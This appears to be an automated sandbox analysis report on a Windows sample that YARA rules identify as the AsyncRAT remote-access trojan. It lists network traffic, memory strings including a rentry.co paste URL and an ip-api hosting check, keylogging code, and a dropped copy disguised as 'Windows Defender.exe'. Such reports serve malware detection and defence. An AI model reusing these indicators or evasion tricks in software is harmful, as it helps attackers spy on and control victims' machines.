Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8067Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8110Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8110Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8110Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8110Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:10:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:10:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8110Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:10:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:10:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8067Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge

Source: powershell.exe, 00000008.00000002.1854619470.000001B13C414000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2095107365.000002786B961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000A.00000002.2095107365.000002786B961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mH
Source: powershell.exe, 0000000A.00000002.2095107365.000002786B9BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: owuP726k3d.exe, Windows Defender.exe.0.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.1598749378.0000025190072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1698421338.00000194A8E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834435428.000001B133E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2727195989.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rentry.co
Source: powershell.exe, 00000005.00000002.1712125357.00000194B1412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: powershell.exe, 00000002.00000002.1581807270.0000025180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123FFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1581807270.0000025180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.000002780003B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1581807270.0000025180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123FFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2095107365.000002786B9BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsofm/pki/certs/MicRooCerAut_2010-06-23.
Source: powershell.exe, 00000008.00000002.1849764161.000001B13C110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.VisualC
Source: powershell.exe, 00000002.00000002.1581807270.0000025180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1639098967.0000019498DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1746254653.000001B123DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1889155015.0000027800001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1889155015.0000027800229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1598749378.0000025190072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1698421338.00000194A8E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834435428.000001B133E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2044985244.0000027810071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, owuP726k3d.exe, 00000000.00000002.2727195989.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co
Source: owuP726k3d.exe, Windows Defender.exe.0.dr	String found in binary or memory: https://rentry.co/8wum7vax/raw

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49817 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Contains functionality to log keystrokes (.Net Source)

Source: owuP726k3d.exe, XLogger.cs	.Net Code: KeyboardLayout
Source: Windows Defender.exe.0.dr, XLogger.cs	.Net Code: KeyboardLayout

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\owuP726k3d.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: owuP726k3d.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD15B26	0_2_00007FFB4AD15B26
Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD112C9	0_2_00007FFB4AD112C9
Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD19169	0_2_00007FFB4AD19169
Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD168D2	0_2_00007FFB4AD168D2
Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD11DC1	0_2_00007FFB4AD11DC1
Source: C:\Users\user\Desktop\owuP726k3d.exe	Code function: 0_2_00007FFB4AD11B39	0_2_00007FFB4AD11B39
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Code function: 14_2_00007FFB4AD312C9	14_2_00007FFB4AD312C9
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Code function: 14_2_00007FFB4AD31B39	14_2_00007FFB4AD31B39
